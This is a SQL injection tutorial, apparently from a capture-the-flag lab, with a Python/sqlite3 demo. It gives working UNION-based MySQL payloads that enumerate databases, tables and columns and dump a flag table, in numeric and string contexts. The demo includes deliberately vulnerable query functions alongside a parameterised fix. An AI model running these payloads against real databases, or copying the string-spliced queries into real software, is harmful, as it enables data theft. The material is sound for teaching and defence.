query 1 union query 2
We want query 1 to contribute nothing, so that everything displayed on the page comes from query 2, the statement we inject. With id=-1 no row matches, so query 1 returns an empty result set and nothing is displayed for it; the rows produced by query 2 are then shown in its place. Two caveats apply to every payload below: UNION requires both SELECTs to return the same number of columns (the original query here returns two, which is why each payload starts with "select 1, ..."; the 1 fills the first column and the group_concat() result lands in the second, the one that is echoed back), and the injected rows are only visible when at least one column of the original query is printed on the page.
Numeric context (the id value is spliced into the query unquoted), enumerating databases, tables, columns, then the data:
-1 union select 1, group_concat(schema_name) from information_schema.schemata
-1 union select 1, group_concat(table_name) from information_schema.tables where table_schema='sqli'
-1 union select 1, group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag'
-1 union select 1, group_concat(flag) from sqli.flag
String context (the id value sits inside single quotes): the leading ' closes the open quote so the rest of the payload is parsed as SQL, and the trailing # turns the original closing quote and anything after it into a MySQL comment. The steps are otherwise identical:
-1' union select 1, group_concat(schema_name) from information_schema.schemata #
-1' union select 1, group_concat(table_name) from information_schema.tables where table_schema='sqli' #
-1' union select 1, group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='flag' #
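Worked example, added here and not part of the original page: a self-contained Python/sqlite3 reproduction of the mechanism above. It assumes a constructed schema (a users table and a flag table in place of the sqli database), uses sqlite_master where MySQL would use information_schema.tables, and uses -- for the comment because SQLite does not recognise #. It shows the numeric and string contexts side by side, why a wrong column count makes the database reject the payload, and that a bound parameter makes the same input harmless.

```python
import sqlite3


def build_db() -> sqlite3.Connection:
    """Constructed demo database standing in for the page's `sqli` database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT);
        INSERT INTO users VALUES (1, 'alice'), (2, 'bob');
        CREATE TABLE flag (id INTEGER PRIMARY KEY, flag TEXT);
        INSERT INTO flag VALUES (1, 'flag{constructed_example}');
    """)
    return conn


def lookup_numeric(conn, id_param: str):
    """Vulnerable: the parameter is spliced in unquoted (numeric context)."""
    sql = f"SELECT id, name FROM users WHERE id={id_param}"
    return conn.execute(sql).fetchall()


def lookup_string(conn, id_param: str):
    """Vulnerable: the parameter sits inside single quotes (string context)."""
    sql = f"SELECT id, name FROM users WHERE id='{id_param}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, id_param: str):
    """Fixed: a bound parameter is data, it can never become SQL syntax."""
    return conn.execute("SELECT id, name FROM users WHERE id=?", (id_param,)).fetchall()


def enumerate_tables():
    # Table-listing step: id=-1 matches no user, so the only row displayed is the
    # one built by the injected SELECT. sqlite_master is the SQLite analogue of
    # information_schema.tables (assumption of this demo, not the page's target).
    conn = build_db()
    payload = "-1 union select 1, group_concat(name) from sqlite_master where type='table'"
    return lookup_numeric(conn, payload)


def dump_flag_numeric():
    # Final step in numeric context: read the flag column of the flag table.
    conn = build_db()
    return lookup_numeric(conn, "-1 union select 1, group_concat(flag) from flag")


def dump_flag_string():
    # String context: the leading ' closes the open quote, the trailing comment
    # swallows the original closing quote. MySQL accepts #, SQLite only --.
    conn = build_db()
    return lookup_string(conn, "-1' union select 1, group_concat(flag) from flag --")


def column_count_mismatch_rejected():
    # Why every payload begins with "select 1, ...": the original SELECT returns
    # two columns, so a one-column injected SELECT is refused outright.
    conn = build_db()
    try:
        lookup_numeric(conn, "-1 union select group_concat(flag) from flag")
    except sqlite3.OperationalError:
        return True
    return False


def safe_lookup_ignores_payload():
    # Same payload through a bound parameter: compared as a literal string,
    # matches nothing, runs no injected SELECT.
    conn = build_db()
    return lookup_safe(conn, "-1 union select 1, group_concat(flag) from flag")


if __name__ == "__main__":
    print(enumerate_tables())
    print(dump_flag_numeric())
    print(dump_flag_string())
    print(column_count_mismatch_rejected())
    print(safe_lookup_ignores_payload())
```

The two vulnerable functions differ only in whether the value is quoted, which is exactly the difference between the two payload sets above; the payload for the string context is the numeric one with a leading quote and a trailing comment marker. Against a real MySQL target, replace sqlite_master with the information_schema queries from the page and -- with #.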